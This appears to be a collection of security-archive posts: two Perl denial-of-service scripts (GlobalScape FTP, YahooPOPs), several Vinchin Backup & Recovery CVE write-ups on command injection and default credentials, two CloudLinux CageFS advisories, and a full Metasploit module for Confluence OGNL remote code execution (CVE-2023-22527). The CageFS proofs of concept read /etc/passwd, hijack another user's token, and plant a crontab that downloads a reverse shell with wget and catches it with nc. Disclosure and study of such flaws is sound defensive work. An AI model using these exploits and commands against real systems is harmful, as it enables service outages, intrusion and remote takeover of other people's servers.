<pre><code>#!/usr/bin/perl<br />use strict;<br />use IO::Socket;<br /><br />print "GlobalScape Secure FTP Server 3.0 - Denial of Service \n";<br /><br />my $payload = "\x41\x42\x0a\x00"x147;<br /><br />my $buffer = "\x41"x2043 . "\x41\x42\x43\x00" . "\x42"x36 . $payload;<br /><br />my $sock = IO::Socket::INET->new(PeerAddr => '192.168.0.10', PeerPort => 21, Proto => 'tcp');<br />if ($sock) {<br /> print "[+] Connected to FTP server\n";<br /> print "[+] Sending Username\n";<br /> print $sock "USER anonymous\r\n";<br /> print "[+] Sending Password\n";<br /> print $sock "PASS anonymous\r\n";<br /> print "[+] Sending payload to exploit \nn";<br /> print $sock $buffer . "\r\n";<br /> print "[+] Exploit!\n";<br /> close($sock);<br />} else {<br /> print "Can't connect to FTP\n";<br />}<br /></code></pre>
<pre><code>CVE ID: CVE-2024-22903<br /><br />Title: Command Injection Vulnerability in SystemHandler.class.php of Vinchin Backup & Recovery Versions 7.2 and Earlier<br /><br />Description:<br />A significant security vulnerability, CVE-2024-22903, has been identified in the `deleteUpdateAPK` function within the `SystemHandler.class.php` file of Vinchin Backup & Recovery software, affecting versions 7.2 and earlier. This function, designed to delete APK files, is prone to a command injection vulnerability due to improper handling of input parameters.<br /><br />Function Analysis:<br />- The function extracts `md5` and `file_name` parameters from user input.<br />- It includes a check for an empty `file_name`, but lacks adequate validation or sanitization for the input used in constructing system commands.<br />- The command to delete the specified APK file, built using the `file_name` parameter, is executed via the `exec` function, leading to a security vulnerability.<br /><br />Exploitation Risk:<br />Attackers can exploit this flaw by inserting malicious commands in the `file_name` parameter. When this parameter is processed by the vulnerable function, the injected commands are executed on the server, presenting a severe risk of unauthorized access or control.<br /><br />Current Status:<br />As of the latest information, there is no known patch available for this vulnerability in versions 7.2 and earlier of Vinchin Backup & Recovery.<br /><br />Recommendation:<br />Users are urged to be vigilant and to monitor Vinchin for any security updates. Until a patch is released, implementing additional security controls and closely monitoring system activity is crucial for mitigating the risk posed by this vulnerability.<br /><br />Signed,Valentin Lobstein<br /><br /></code></pre>
<pre><code>CVE ID: CVE-2024-22902<br /><br />Title: Default Root Credentials Vulnerability in Vinchin Backup & Recovery v7.2<br /><br />Suggested Description:<br />Vinchin Backup & Recovery version 7.2 has been identified as being configured with default root credentials, posing a significant security vulnerability.<br /><br />Additional Information:<br />There is no documentation or guidance from Vinchin on changing the root password for this version. The use of password authentication as root is possible, leading to potential unauthorized access.<br /><br />Vulnerability Type:<br />Incorrect Access Control<br /><br />Vendor of Product:<br />Vinchin<br /><br />Affected Product Code Base:<br />Vinchin - Version 7.2<br /><br />Attack Type:<br />Remote<br /><br />Impact - Escalation of Privileges:<br />True<br /><br />Attack Vectors:<br />This security flaw can be exploited through both local and remote access using the default root credentials provided in the software.<br /><br />Discoverer:<br />Valentin Lobstein<br /><br />References:<br />- http://vinchin.com<br /><br />Conclusion:<br />The existence of default root credentials in Vinchin Backup & Recovery v7.2 (CVE-2024-22902) is a serious security oversight. Users of this software version should be aware of the risks and stay alert for any updates or security patches from Vinchin. Immediate action should be taken to change these credentials to prevent unauthorized access.<br /><br />Signed,Valentin Lobstein<br /><br /></code></pre>
<pre><code>CVE ID: CVE-2024-22901<br /><br />Title: Default MYSQL Credentials Vulnerability in Vinchin Backup & Recovery v7.2<br /><br />Description:<br />A critical security issue, identified as CVE-2024-22901, has been discovered in Vinchin Backup & Recovery version 7.2. The software has been found to use default MYSQL credentials, which could lead to significant security risks.<br /><br />Additional Information:<br />Vinchin has not addressed previous disclosures, including CVE-2022-35866, and has not patched the reported vulnerabilities. The presence of these unresolved issues, now compounded by the newly discovered vulnerability of default MYSQL credentials, opens up potential avenues for easy unauthenticated Remote Code Execution (RCE). This lack of response is alarming for a product that is certified in cybersecurity and poses a considerable risk to its users.<br /><br />Vulnerability Type:<br />Incorrect Access Control<br /><br />Vendor of Product:<br />Vinchin<br /><br />Affected Product Code Base:<br />Vinchin Backup & Recovery - Version 7.2<br /><br />Affected Component:<br />The MySQL database used by Vinchin Backup & Recovery<br /><br />Attack Type:<br />Remote<br /><br />Impact - Escalation of Privileges:<br />True<br /><br />Attack Vectors:<br />The vulnerability can be exploited via local or remote access, utilizing the unpatched default MySQL credentials.<br /><br />Discoverer:<br />Valentin Lobstein<br /><br />Reference:<br />http://vinchin.com<br /><br />Conclusion:<br />The discovery of CVE-2024-22901 highlights a critical oversight in Vinchin Backup & Recovery's security posture. Users are advised to be cautious and to monitor for any updates or patches from Vinchin, which should be applied immediately to mitigate this risk.<br /><br />Signed,Valentin Lobstein<br /><br /></code></pre>
<pre><code>CVE ID: CVE-2024-22899<br /><br />Title: Command Injection Vulnerability in Vinchin Backup and Recovery's syncNtpTime Function in Versions 7.2 and Earlier<br /><br />Description:<br />A critical security vulnerability, identified as CVE-2024-22899, has been discovered in the `syncNtpTime` function of Vinchin Backup and Recovery software. This issue affects versions 7.2 and earlier. The function, part of the `SystemHandler.class.php` file, is designed for synchronizing system time with NTP servers but is prone to a command injection vulnerability due to improper handling of user input.<br /><br />Function Analysis:<br />- The function is responsible for handling the `ntphost` parameter, which is expected to contain the address of the NTP server.<br />- The vulnerability stems from the direct concatenation of this parameter into a system command line, without adequate validation or sanitization.<br />- This design flaw allows an attacker to inject arbitrary commands into the `ntphost` parameter, which are then executed by the system.<br /><br />Current Status:<br />As of now, there is no patch available for this vulnerability in versions 7.2 and earlier of Vinchin Backup and Recovery. Users of these versions are at risk of exploitation.<br /><br />Recommendation:<br />It is advised for users of Vinchin Backup and Recovery versions 7.2 and earlier to remain alert and monitor for updates from Vinchin. Once a patch becomes available, it should be applied immediately to mitigate the risk posed by this vulnerability.<br /><br />Conclusion:<br />The discovery of CVE-2024-22899 underscores the importance of rigorous input validation and sanitization in software development. This vulnerability poses a severe security risk, potentially leading to unauthorized system access or control.<br /><br />Signed,Valentin Lobstein<br /><br /></code></pre>
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA256<br /><br /># CloudLinux CageFS Insufficiently Restricted Proxy Command #<br /><br />Link: https://github.com/sbaresearch/advisories/tree/public/2020/SBA-ADV-20200707-02_CloudLinux_CageFS_Insufficiently_Restricted_Proxy_Commands<br /><br />## Vulnerability Overview ##<br /><br />CloudLinux CageFS 7.0.8-2 or below insufficiently restricts file paths<br />supplied to the `sendmail` proxy command. This allows local users to read<br />and write arbitrary files of certain file formats outside the CageFS<br />environment.<br /><br />* **Identifier** : SBA-ADV-20200707-02<br />* **Type of Vulnerability** : External Control of File Name or Path<br />* **Software/Product Name** : [CloudLinux CageFS](https://www.cloudlinux.com/)<br />* **Vendor** : CloudLinux Inc.<br />* **Affected Versions** : <= 7.0.8-2<br />* **Fixed in Version** : 7.1.1-1<br />* **CVE ID** : CVE-2020-36772<br />* **CVSS Vector** : CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L<br />* **CVSS Base Score** : 6.6 (Medium)<br /><br />## Vendor Description ##<br /><br />> CloudLinux OS is the leading platform for multitenancy. It improves<br />> server stability, density, and security by isolating each tenant and<br />> giving them allocated server resources. This creates an environment<br />> that feels more like a virtual server than a shared hosting account.<br />> By doing so, CloudLinux OS reduces operating costs and churn rates,<br />> and increases profitability.<br /><br />Source: <https://www.cloudlinux.com/><br /><br />## Impact ##<br /><br />A CageFS-restricted local user can read and write arbitrary files of certain<br />file formats outside the CageFS environment by exploiting the vulnerability<br />documented in this advisory.<br /><br />## Vulnerability Description ##<br /><br />CloudLinux offers a feature called proxy commands in CageFS environments.<br />It allows limited execution of commands outside the CageFS environment from<br />a user restricted within the CageFS environment.<br /><br />CageFS allows in its default configuration to execute `sendmail` as a proxy<br />command outside the CageFS environment. This default configuration is<br />designed to allow local programs sending emails by invoking `sendmail`.<br />Due to the insufficient validation of sendmail's arguments an attacker can<br />invoke other sendmail functionality as well. While CageFS applies some<br />restrictions to the allowed arguments it does not restrict or validate the<br />`-bi` and `-oA` arguments.<br /><br />Therefore, an attacker can have `sendmail` access arbitrary files which will<br />be interpreted as alias database files by enabling the `newalias` mode of<br />`sendmail` with `-bi` and specifying a file located outside the CageFS<br />environment with `-oA`.<br /><br />On systems using the Postfix to Sendmail compatibility interface, a great<br />number of different alias database types can be used to craft exploits.<br />The compatibility interface internally calls `postalias` and besides the<br />`-oA` argument already being dangerous by itself, it also suffers from an<br />argument injection issue, which allows injection of additional Postfix<br />specific arguments for `postalias`. However, this is not a security issue<br />in Postfix.<br /><br />According to Postfix developers, Postfix's `sendmail` does not enforce a<br />security policy on command-line arguments. Instead, it relies on the<br />UNIX/Linux system to enforce access policies based on the effective user and<br />group IDs of the process. If a security policy should be enforced, the<br />calling process must sanitize the command-line arguments before they are<br />given to `sendmail`. This includes but is not limited to sanity checks on<br />pathnames, and if applicable sanity checks on file contents in a way that<br />is not vulnerable to time-of-check to time-of-use race attacks, and<br />disabling options processing with `--`.<br /><br />## Proof of Concept ##<br /><br />For example, an attacker can read arbitrary files that at least partially<br />follow the structure `key <whitespace> value` via the lookup table type<br />`texthash`:<br /><br />```sh<br />$ sendmail -bi -oA'-s,-f,texthash:/etc/passwd'<br />postalias: warning: /etc/passwd, line 1: expected format: key whitespace value -- ignoring this line<br />[...]<br />postalias: warning: /etc/passwd, line 211: expected format: key whitespace value -- ignoring this line<br />sssd:x:496:493:User: for sssd:/:/sbin/nologin<br />dbus:x:81:81:System: message bus:/:/sbin/nologin<br />polkitd:x:497:495:User: for polkitd:/:/sbin/nologin<br />tss:x:59:59:Account: used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin<br />systemd-resolve:x:193:193:systemd: Resolver:/:/sbin/nologin<br />rngd:x:494:491:Random: Number Generator Daemon:/var/lib/rngd:/sbin/nologin<br />sshd:x:74:74:Privilege-separated: SSH:/var/empty/sshd:/sbin/nologin<br />systemd-coredump:x:499:497:systemd: Core Dumper:/:/sbin/nologin<br />nobody:x:65534:65534:Kernel: Overflow User:/:/sbin/nologin<br />ftp:x:14:50:FTP: User:/var/ftp:/sbin/nologin<br />unbound:x:498:496:Unbound: DNS resolver:/etc/unbound:/sbin/nologin<br />nrpe:x:492:486:NRPE: user for the NRPE service:/var/run/nrpe:/sbin/nologin<br />```<br /><br />The attacker can also use other lookup table types which might disclose<br />sensitive information. For example, `unix` allows the query of specific<br />users regardless of the format:<br /><br />```sh<br />$ sendmail -bi -oA'-q,ftp2406151,unix:passwd.byname'<br />ftp2406151:x:935:935::/home/ftp2406151:/sbin/nologin<br />```<br /><br />An attacker can also write specific file formats outside the CageFS<br />environment. For example, with the `hash` lookup table type:<br /><br />```sh<br />$ echo sba:was_here | sendmail -bi -oA'-o,-p,-i,-f,hash:/tmp/sba_was_here'<br />$ sendmail -bi -oA'-s,-f,hash:/tmp/sba_was_here'<br />@: @<br />YP_LAST_MODIFIED: 1594138203<br />YP_MASTER_NAME: localhost<br />sba: was_here<br />```<br /><br />## Recommended Countermeasures ##<br /><br />We recommend to restrict the `sendmail` command to only strictly required<br />parameters using an allow list approach. At least the following parameters<br />are known to cause dangerous behavior:<br /><br />* `-oA`: Allows specification of multiple paths and additional arguments.<br /> It is important to consider that it is directly followed by the pathname<br /> without a separator, i.e., `-oA/etc/passwd`.<br />* `-bi`: Enables the `newalias` mode of `sendmail`.<br />* `-I`: Enables the `newalias` mode of `sendmail`.<br />* `-v`: If the parameter is added at least two times, i.e., `-vv`,<br /> `-vvvvv` or `-v -v`, it enables the verbose mode, which leaks the<br /> Postfix configuration in some cases.<br /><br />We did not fully analyze other parameters of `sendmail`, therefore, it is<br />possible that `sendmail` as proxy command is also prone to other attacks.<br /><br />## Timeline ##<br /><br />* `2020-07-07`: identification of vulnerability in version 7.0.6-1<br />* `2020-07-10`: initial vendor contact<br />* `2020-07-13`: initial vendor response<br />* `2020-07-13`: disclosed vulnerability to vendor security contact<br />* `2020-08-06`: vendor released version 7.1.1-1 to testing<br />* `2020-09-03`: vendor released version 7.1.1-1 to production<br />* `2020-10-02`: request CVE from MITRE<br />* `2022-01-04`: MITRE declined request as it falls in the scope of Red Hat<br />* `2024-01-19`: request CVE from Red Hat<br />* `2024-01-22`: Red Hat assigned CVE-2020-36772<br />* `2024-01-25`: public disclosure<br /><br />## References ##<br /><br />* CageFS 7.1.1-1 beta: <https://blog.cloudlinux.com/beta-cagefs-and-alt-python27-cllib-updated-1><br />* CageFS 7.1.1-1 production: <https://blog.cloudlinux.com/lve-manager-lve-stats-lve-utils-and-alt-python27-cllib-have-been-rolled-out-to-100><br /><br />## Credits ##<br /><br />* David Lisa Gnedt ([SBA Research](https://www.sba-research.org/))<br />-----BEGIN PGP SIGNATURE-----<br /><br />iQIzBAEBCAAdFiEEL9Wp/yZWFD9OpIt6+7iGL1j3dbIFAmWyn0kACgkQ+7iGL1j3<br />dbL5PhAAspmKHEa29DXuwNjJ/3l96fX2AiuPj5NDhoSF01tfakpNE0w86c8GiGvw<br />GRhGQ0n1AO9qNcfyULjWjtQ8FwFuRPzPI0mfaycW2oDQ3BAG2LtFqmQvpUzTV6tP<br />pckL2H50ptablRYlphFEY0XDt42ezU3wjokNK/cpRhZlzCs7mvd6LuCg5qXwBno/<br />srsxlb4n1IdZRF5mh7ariYpObDvLUctwhri7RCBEqb6MZh+y6rSSPKsGdCHq/su2<br />6KEH0mxNPwMJtccNah29SWvv+fZ9+mkK1IuuWIdhyM2XMTJxOE4n0AsoISVGI6bH<br />9XgL0AQ3B3kyoqHbfCyoUonbz4mSdTFInqpuqlU0X6Wos+kjnS/27sH/De8ba+mm<br />jmDDQFmoe1QrVkbDjXI7zBy81Qh3nVZ/qig/1SCex0i+IyO4HpdCYbjrs7I76C0V<br />fvpd0VWb3BKpGHA4IhISA/jmCSlvxW+2gkHrhxfWhM1K3Pa/a0qH9RuCFAZ7B9qP<br />OQM3Yrhbikqyaqh/ZI7nYMc33KfiPCiXKejDtaTGIVVThKHr1mQibgaYt+ILi0RH<br />8uxH+tpuVqjEgVHZQMBQEAa3WvaGYo2kJJxU0z+3m/s6W45JhGguMzrH/n9z6XKo<br />H4xyTp1YQ3aP6gZBgoMEkipkc0B+QK/zb+xOghfE3Cbjdx47gCo=<br />=E60q<br />-----END PGP SIGNATURE-----<br /><br /></code></pre>
<pre><code>-----BEGIN PGP SIGNED MESSAGE-----<br />Hash: SHA256<br /><br /># CloudLinux CageFS Token Disclosure #<br /><br />Link: https://github.com/sbaresearch/advisories/tree/public/2020/SBA-ADV-20200707-01_CloudLinux_CageFS_Token_Disclosure<br /><br />## Vulnerability Overview ##<br /><br />CloudLinux CageFS 7.1.1-1 or below passes the authentication token as a<br />command line argument. In some configurations this allows local users to<br />view the authentication token via the process list and gain code execution<br />as another user.<br /><br />* **Identifier** : SBA-ADV-20200707-01<br />* **Type of Vulnerability** : Invocation of Process Using Visible Sensitive Information<br />* **Software/Product Name** : [CloudLinux CageFS](https://www.cloudlinux.com/)<br />* **Vendor** : CloudLinux Inc.<br />* **Affected Versions** : <= 7.1.1-1<br />* **Fixed in Version** : 7.1.2-2<br />* **CVE ID** : CVE-2020-36771<br />* **CVSS Vector** : CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H<br />* **CVSS Base Score** : 7.8 (High)<br /><br />## Vendor Description ##<br /><br />> CloudLinux OS is the leading platform for multitenancy. It improves<br />> server stability, density, and security by isolating each tenant and<br />> giving them allocated server resources. This creates an environment<br />> that feels more like a virtual server than a shared hosting account.<br />> By doing so, CloudLinux OS reduces operating costs and churn rates,<br />> and increases profitability.<br /><br />Source: <https://www.cloudlinux.com/><br /><br />## Impact ##<br /><br />If the `lve_namespaces` service or the virtualized proc filesystem<br />feature is disabled, a local user can obtain the CageFS authentication<br />token of other users by exploiting the vulnerability documented in this<br />advisory. In most configurations this allows attackers to gain code<br />execution as those users.<br /><br />## Vulnerability Description ##<br /><br />CloudLinux offers a feature called proxy commands in CageFS environments.<br />It allows limited execution of commands outside the CageFS environment from<br />a user restricted within the CageFS envinronment.<br /><br />For this purpose a CageFS daemon runs outside of the CageFS environment,<br />it is accessible via a UNIX socket from within the CageFS environment.<br />The UNIX socket is handled by `proxyexec`. To make the whole process of<br />calling a tool outside of the CageFS transparent to the user, wrapper<br />scripts are placed within CageFS, which in turn call `proxyexec` for<br />execution of the commands outside of the CageFS environment.<br /><br />Those wrapper scripts read the CageFS token from `/var/.cagefs/.cagefs.token`<br />and pass it to the `proxyexec` command as a command line argument.<br /><br />CloudLinux by default enables the virtualized proc filesystem, which<br />prevents other users from seeing the CageFS token within the process<br />list. However, if the `lve_namespaces` service is disabled, e.g. the<br />systemd unit is masked out, or the virtualized proc filesystem is<br />explicitly disabled, other users can see the CageFS token within the<br />process list. They can use the CageFS token of other users to talk to<br />the CageFS daemon via `proxyexec` and the CageFS daemon executes the<br />commands with the privileges of the supplied authentication token.<br /><br />## Proof of Concept ##<br /><br />Let's assume, the `lve_namespaces` service is disabled and we are user<br />`ftp2406151`:<br /><br />```sh<br />$ id<br />uid=935(ftp2406151) gid=935(site2406151) groups=935(site2406151)<br />```<br /><br />We list the process list and find another user executing `ping example.org`:<br /><br />```sh<br />$ ps aux | grep proxyexec<br /> 2094 root 0:00 /usr/sbin/proxyexec -q -d -s /var/lib/proxyexec/cagefs.sock/socket /bin/cagefs.server<br />1180646 934 0:00 /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / PING 1180642 example.org<br />1180647 root 0:00 /usr/sbin/proxyexec -q -d -s /var/lib/proxyexec/cagefs.sock/socket /bin/cagefs.server<br />1181229 ftp24061 0:00 grep proxyexec<br />```<br /><br />We now can execute commands as user `ftp1488781` and, for example, view<br />the crontab:<br /><br />```sh<br />$ /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_LIST 0<br />no crontab for ftp1488781<br />```<br /><br />Now we setup a new crontab entry, which downloads a reverse shell and<br />executes it every minute:<br /><br />```sh<br />$ echo '* * * * * wget -q -O rshell https://www.example.org/rshell && chmod +x rshell && nohup ./rshell &' | /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_SAVE 0<br />```<br /><br />```sh<br />$ /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_LIST 0<br />* * * * * wget -q -O rshell https://www.example.org/rshell && chmod +x rshell && nohup ./rshell &<br />```<br /><br />Our shell connects back to us and we can execute arbitrary commands as<br />the other user:<br /><br />```sh<br />$ nc -l -p 1234<br />id<br />uid=934(ftp1488781) gid=934(site1488781) groups=934(site1488781)<br />```<br /><br />## Recommended Countermeasures ##<br /><br />We recommend to avoid passing sensitive information as a command line<br />argument. Instead, `proxyexec` should directly read the CageFS token<br />from the file `/var/.cagefs/.cagefs.token` and pass it to the CageFS<br />daemon via the UNIX socket.<br /><br />## Timeline ##<br /><br />* `2020-07-07`: identification of vulnerability in version 7.0.6-1<br />* `2020-07-10`: initial vendor contact<br />* `2020-07-13`: initial vendor response<br />* `2020-07-13`: disclosed vulnerability to vendor security contact<br />* `2020-09-02`: vendor released version 7.1.2-2 to testing<br />* `2020-09-28`: vendor released version 7.1.2-2 to production<br />* `2020-10-02`: request CVE from MITRE<br />* `2022-01-04`: MITRE declined request as it falls in the scope of Red Hat<br />* `2024-01-19`: request CVE from Red Hat<br />* `2024-01-22`: Red Hat assigned CVE-2020-36771<br />* `2024-01-25`: public disclosure<br /><br />## References ##<br /><br />* CloudLinux OS Documentation. Virtualized /proc filesystem: <https://docs.cloudlinux.com/shared/cloudlinux_os_kernel/#virtualized-proc-filesystem><br />* CageFS 7.1.2-2 beta: <https://blog.cloudlinux.com/beta-cagefs-lve-wrappers-and-bsock-updated><br />* CageFS 7.1.2-2 production: <https://blog.cloudlinux.com/cagefs-lve-wrappers-and-bsock-have-been-rolled-out-to-100><br /><br />## Credits ##<br /><br />* David Lisa Gnedt ([SBA Research](https://www.sba-research.org/))<br />-----BEGIN PGP SIGNATURE-----<br /><br />iQIzBAEBCAAdFiEEL9Wp/yZWFD9OpIt6+7iGL1j3dbIFAmWynusACgkQ+7iGL1j3<br />dbKzLhAAwKYUzx9v+tPeTNNUUrgxibQSZIhtxcvpdfYTFQAm+Rj71F8g+FZIqV0D<br />5uMjUtutldd1Mh9YfEQ5hGbOawYqnfL9tebEX1SqdbraSD3r4tQEAMowgBMREpFJ<br />DgUyIVTSnFVTQqcai2wpObPRgs397qM8mrykH5rAKdLD1kBfpULq7Duec62E740u<br />Ay4YiIiO0OZWf7WElH3KunICE/Sv4TzqZ3DEIlSsQZQv8zM5r44O93FhMiMO6n3R<br />pKfK8F4ub2y4e3gkW1uaoGO7ZwAW3aR+F5FAi6R5MJXm0RxIibL9tqCyVVrlXTS6<br />BZiFzsE9ATSSMGVGGH6O6rb1KXXXTc5jopEjGbQgWMKmZn+NK4yHzITFydzJi04P<br />oaoQmbBWyN4OdfGApvUomyqPp6uUE+i1RfniHq+7vmIR5I7D/KsLQorYonmwD/26<br />b5BQ99M7sNGHlWbt1vn9imtDj+nw9JTK2425t6swJOc4QPxdKQtx6hESvRJHiPer<br />M3VFmgj9c19mXQb2B+k+GgM4h7lrhvOyWGreWo1sOBtwcLX7i3zqkCOqowI3DedE<br />cWV2qjNqTUqM4EMn6Gx5Rf32Kp6e1Jj0GXmMl7TVY5taBSyQ7UXPJkLT6MfyM1v6<br />hf5wIsINv1dNRQxpWgXiDvZ+d0AdSNxYfRZFe1wyQIKQbwLYm6w=<br />=d1f0<br />-----END PGP SIGNATURE-----<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /><br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HTTP::Atlassian::Confluence::Version<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Atlassian Confluence SSTI Injection',<br /> 'Description' => %q{<br /> This module exploits an SSTI injection in Atlassian Confluence servers. A specially crafted HTTP request uses<br /> the injection to evaluate an OGNL expression resulting in OS command execution.<br /> Versions 8.5.0 through 8.5.3 and 8.0 to 8.4 are known to be vulnerable.<br /> },<br /> 'Author' => [<br /> 'Rahul Maini', # ProjectDiscovery analysis<br /> 'Harsh Jaiswal', # ProjectDiscovery analysis<br /> 'Spencer McIntyre'<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-22527'],<br /> ['URL', 'https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html'],<br /> ['URL', 'https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/']<br /> ],<br /> 'DisclosureDate' => '2024-01-16', # Atlassian advisory released<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => ['unix', 'linux', 'win'],<br /> 'Arch' => [ARCH_CMD],<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => ARCH_CMD<br /> }<br /> ],<br /> [<br /> 'Windows Command',<br /> {<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_CMD,<br /> 'Payload' => { 'Space' => 8191, 'DisableNops' => true }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 8090<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('TARGETURI', [true, 'Base path', '/'])<br /> ])<br /> end<br /><br /> def get_confluence_platform<br /> # this method gets the platform by exploiting CVE-2023-22527<br /> return @confluence_platform if @confluence_platform<br /><br /> header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"<br /> ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')<br /> @org.apache.struts2.ServletActionContext@getResponse().setHeader(<br /> '#{header}',<br /> (@java.lang.System@getProperty('os.name'))<br /> )<br /> OGNL<br /> res = inject_ognl(ognl)<br /> return nil unless res<br /><br /> res.headers[header]<br /> end<br /><br /> def check<br /> confluence_version = get_confluence_version<br /> return CheckCode::Unknown('Failed to determine the Confluence version.') unless confluence_version<br /><br /> vprint_status("Detected Confluence version: #{confluence_version}")<br /> if confluence_version > Rex::Version.new('8.5.3')<br /> return CheckCode::Safe("Version #{confluence_version} is not affected.")<br /> end<br /><br /> confluence_platform = get_confluence_platform<br /> unless confluence_platform<br /> return CheckCode::Safe('Failed to test OGNL injection.')<br /> end<br /><br /> vprint_status("Detected target platform: #{confluence_platform}")<br /> CheckCode::Vulnerable('Successfully tested OGNL injection.')<br /> end<br /><br /> def exploit<br /> confluence_platform = get_confluence_platform<br /> unless confluence_platform<br /> fail_with(Failure::NotVulnerable, 'The target is not vulnerable.')<br /> end<br /><br /> unless confluence_platform.downcase.start_with?('win') == (target['Platform'] == 'win')<br /> fail_with(Failure::NoTarget, "The target platform '#{confluence_platform}' is incompatible with '#{target.name}'")<br /> end<br /><br /> print_status("Executing #{payload_instance.refname} (#{target.name})")<br /> execute_command(payload.encoded)<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> param = rand_text_alphanumeric(6..10)<br /> # reference a parameter in the OGNL to work around the 200 character length limit<br /> ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')<br /> (new freemarker.template.utility.Execute()).exec(<br /> {@org.apache.struts2.ServletActionContext@getRequest().getParameter('#{param}')}<br /> )<br /> OGNL<br /><br /> if target['Platform'] == 'win'<br /> vars_post = { param => "cmd.exe /c \"#{cmd}\"" }<br /> else<br /> # the command is executed via Runtime.exec, so sh -c "#{cmd}" will not work with all payloads<br /> # see: https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html?m=1<br /> vars_post = { param => "sh -c $@|sh . echo #{cmd}" }<br /> end<br /><br /> inject_ognl(ognl, 'vars_post' => vars_post)<br /> end<br /><br /> def inject_ognl(ognl, opts = {})<br /> opts = opts.clone<br /> param = rand_text_alphanumeric(6..10)<br /> final_opts = {<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'template/aui/text-inline.vm'),<br /> 'vars_post' => {<br /> # label and param are both limited to a 200 character length by default<br /> 'label' => "\\u0027+#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet(\\u0027ognl\\u0027).findValue(#parameters.#{param},{})+\\u0027",<br /> param => ognl<br /> }.merge(opts.delete('vars_post') || {})<br /> }.merge(opts)<br /><br /> send_request_cgi(final_opts)<br /> end<br />end<br /></code></pre>
<pre><code>CVE ID: CVE-2024-22900<br /><br />Title: Command Injection Vulnerability in Vinchin Backup and Recovery Versions 7.2 and Earlier<br /><br />Description:<br />A critical security vulnerability, identified as CVE-2024-22900, has been discovered in Vinchin Backup and Recovery software, affecting versions 7.2 and earlier. The vulnerability is present in the `setNetworkCardInfo` function, which is intended to update network card information.<br /><br />Details:<br />1. The function collects the `NAME` parameter from the user request and assigns it to a variable `$name`.<br />2. The `NAME` parameter value is then used to construct a file path in the `setNetworkCardInfo` function, leading to potential command injection.<br />3. The vulnerability arises from the use of user-supplied input in system commands without proper validation and sanitization.<br /><br />Impact:<br />This vulnerability allows an attacker to inject arbitrary commands via the `NAME` parameter, potentially leading to unauthorized access or control over the affected system.<br /><br />Current Status:<br />As of the current date, there is no known patch available for this vulnerability. Users of Vinchin Backup and Recovery versions 7.2 and earlier are at risk.<br /><br />Recommendation:<br />It is strongly recommended that users of the affected software versions remain vigilant and monitor Vinchin's updates for a security patch. Upon release of a patch, users should prioritize updating their systems to mitigate this security risk.<br /><br />Signed,Valentin Lobstein<br /><br /></code></pre>
<pre><code>use IO::Socket;<br /><br /> sub intro {<br /> print q {<br /><br /> ,--,<br /> _ ___/ /\|<br /> ,;'( )__, ) ~<br /> // // '--; <br /> ' \ | ^<br /> ^ ^<br /><br /> [+] YahooPOPs 1.6 - SMTP - Denial of Service (DoS)<br /><br /> [*] Coded by Fernando Mengali<br /><br /> [@] e-mail: fernando.mengalli@gmail.com<br /><br /> }<br /> }<br /><br />intro();<br /><br /><br /> if (!$ARGV[0]) {<br /> print "\nUsage: $0 <ip> <username> <password>\n";<br /> exit(0);<br />}<br /><br />my $host = $ARGV[0];<br />my $username = $ARGV[1];<br />my $password = $ARGV[2];<br />my $port = 110;<br />my $payload = "A" x 500;<br /><br />my $ip = inet_aton($ARGV[0]);<br /><br />my $socket = IO::Socket::INET->new(<br /> PeerAddr => $ip,<br /> PeerPort => $port,<br /> Proto => 'tcp',<br /> Timeout => 10<br />);<br /><br />unless ($socket) {<br /> die "[+] socket() error: $!\n";<br />}<br /><br />print "[+] YahooPOPS SMTP detected, constructing the payload\n";<br /><br />unless ($socket->send($payload)) {<br /> die "[+] Sending error, the server probably rebooted.\n";<br />}<br /></code></pre>
